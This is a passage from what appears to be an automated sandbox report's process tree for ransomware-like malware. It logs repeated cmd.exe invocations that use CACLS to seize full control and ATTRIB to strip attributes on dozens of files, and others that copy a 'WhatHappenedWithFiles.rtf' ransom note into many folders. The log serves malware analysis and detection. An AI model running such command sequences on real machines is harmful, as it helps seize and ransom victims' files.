      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2900
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\USERAC~1\DEFAUL~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp"
        5⤵
        
        PID:1360
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1448
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1208
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp"
        5⤵
        
        PID:2088
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1092
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2800
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp"
        5⤵
        
        PID:2528
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2364
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:300
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp"
        5⤵
        
        PID:1912
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2040
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:680
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp"
        5⤵
        
        PID:2356
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2260
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2996
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp"
        5⤵
        
        PID:2156
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp" /E /G Admin:F /C
        6⤵
        
        PID:568
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:548
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp"
        5⤵
        
        PID:2628
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2456
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1720
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp"
        5⤵
        
        PID:2616
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1992
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2620
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp"
        5⤵
        
        PID:1632
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1332
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp"
        5⤵
        
        PID:2696
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2604
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:992
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp"
        5⤵
        
        PID:1968
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1532
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:376
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp"
        5⤵
        
        PID:2728
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2912
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2836
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp"
        5⤵
        
        PID:1960
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2656
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2564
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp"
        5⤵
        
        PID:2680
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2948
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2776
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp"
        5⤵
        
        PID:1140
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2772
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:944
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp"
        5⤵
        
        PID:1128
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2636
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1744
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp"
        5⤵
        
        PID:2880
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2436
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2876
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp"
        5⤵
        
        PID:1936
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1620
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp"
        5⤵
        
        PID:2080
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1204
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1464
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp"
        5⤵
        
        PID:1584
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2416
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp"
        5⤵
        
        PID:2944
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1044
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2816
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp"
        5⤵
        
        PID:2584
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1676
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1780
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp"
        5⤵
        
        PID:484
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2900
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2892
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp"
        5⤵
        
        PID:2084
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2468
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp"
        5⤵
        
        PID:2864
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1208
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2804
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp"
        5⤵
        
        PID:1360
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2800
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2312
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp"
        5⤵
        
        PID:2088
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp" /E /G Admin:F /C
        6⤵
        
        PID:300
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1500
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp"
        5⤵
        
        PID:1756
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp" /E /G Admin:F /C
        6⤵
        
        PID:680
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1912
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp"
        5⤵
        
        PID:820
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2996
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2356
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp"
        5⤵
        
        PID:1712
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp" /E /G Admin:F /C
        6⤵
        
        PID:548
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:2440
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp"
        5⤵
        
        PID:2156
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp" /E /G Admin:F /C
        6⤵
        
        PID:1720
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:408
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp"
        5⤵
        
        PID:1784
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp" /E /G Admin:F /C
        6⤵
        
        PID:3052
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp"
        5⤵
        
        PID:1332
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp" /E /G Admin:F /C
        6⤵
        
        PID:296
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1292
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp"
        5⤵
        
        PID:2604
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp" /E /G Admin:F /C
        6⤵
        
        PID:2476
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp"
        6⤵
        Views/modifies file attributes
        
        PID:1344
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~1\USERAC~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2556
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MICROS~2\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2708
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C CACLS "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck" /E /G %USERNAME%:F /C & ATTRIB -R -A -H "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck"
        5⤵
        
        PID:2432
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck" /E /G Admin:F /C
        6⤵
        
        PID:1240
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB -R -A -H "C:\Users\All Users\Microsoft Help\Hx_1033_MValidator.Lck"
        6⤵
        Views/modifies file attributes
        
        PID:2656
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\MOZILL~1\updates\308046~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:1684
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{33D1F~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:988
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{4D8DC~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{57A73~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2636
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\SysWOW64\cmd.exe" /C type "C:\Users\Admin\AppData\Roaming\WHATHA~1.RTF" > "C:\Users\ALLUSE~1\PACKAG~1\{61087~1\WhatHappenedWithFiles.rtf"
        5⤵
        
        PID:2436
    - - C:\Windows\SysWOW64\cmd.exe
        
